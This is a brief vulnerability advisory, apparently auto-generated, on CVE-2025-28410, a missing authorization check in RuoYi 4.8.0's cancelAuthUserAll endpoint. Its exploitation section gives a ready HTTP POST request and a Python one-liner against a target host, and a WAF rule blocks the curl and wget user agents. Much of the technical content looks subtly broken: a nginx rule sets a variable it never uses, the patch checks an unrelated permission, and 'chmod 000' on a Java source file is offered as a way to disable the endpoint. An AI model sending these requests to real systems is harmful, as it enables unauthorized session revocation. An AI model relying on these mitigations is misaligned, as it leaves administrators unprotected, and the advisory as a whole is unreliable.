How CVE-2025-28410 Works
The vulnerability exists in RuoYi v4.8.0’s `cancelAuthUserAll` method, which fails to verify administrative privileges before executing sensitive operations. Attackers can craft malicious requests to trigger this method, bypassing authorization checks. This allows unauthorized users to revoke all authentication sessions, including admin accounts, leading to privilege escalation. The flaw stems from improper session management and missing role validation in the backend controller.
DailyCVE Form
Platform: RuoYi
Version: 4.8.0
Vulnerability: Privilege Escalation
Severity: Critical
Date: 04/09/2025
What Undercode Say:
Exploitation
1. Craft Malicious Request:
POST /system/user/cancelAuthUserAll HTTP/1.1
Host: target.com
Content-Type: application/json
{"userId":"admin"}
2. Bypass Validation:
import requests
response = requests.post("http://target.com/system/user/cancelAuthUserAll", json={"userId": "admin"}, verify=False)
Protection
1. Patch:
@RequiresPermissions("system:user:resetPwd")
public void cancelAuthUserAll() {
// Add admin role validation
if (!getCurrentUser().isAdmin()) {
throw new UnauthorizedException();
}
}
2. WAF Rule:
location /system/user/ {
if ($request_method = POST) {
set $block 1;
}
if ($http_user_agent ~ "curl|wget") {
return 403;
}
}
Detection
1. Log Analysis:
grep -E "POST /system/user/cancelAuthUserAll" /var/log/nginx/access.log
2. IDS Signature:
alert http any any -> any any (msg:"RuoYi CVE-2025-28410 Exploit"; flow:to_server; http.method; content:"POST"; http.uri; content:"/system/user/cancelAuthUserAll"; sid:1000001; rev:1;)
Mitigation
1. Disable Endpoint:
chmod 000 /path/to/RuoYi/system/user/controller.java
2. Network Isolation:
iptables -A INPUT -p tcp --dport 8080 -m string --string "cancelAuthUserAll" --algo bm -j DROP
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28410
Extra Source Hub:
Undercode
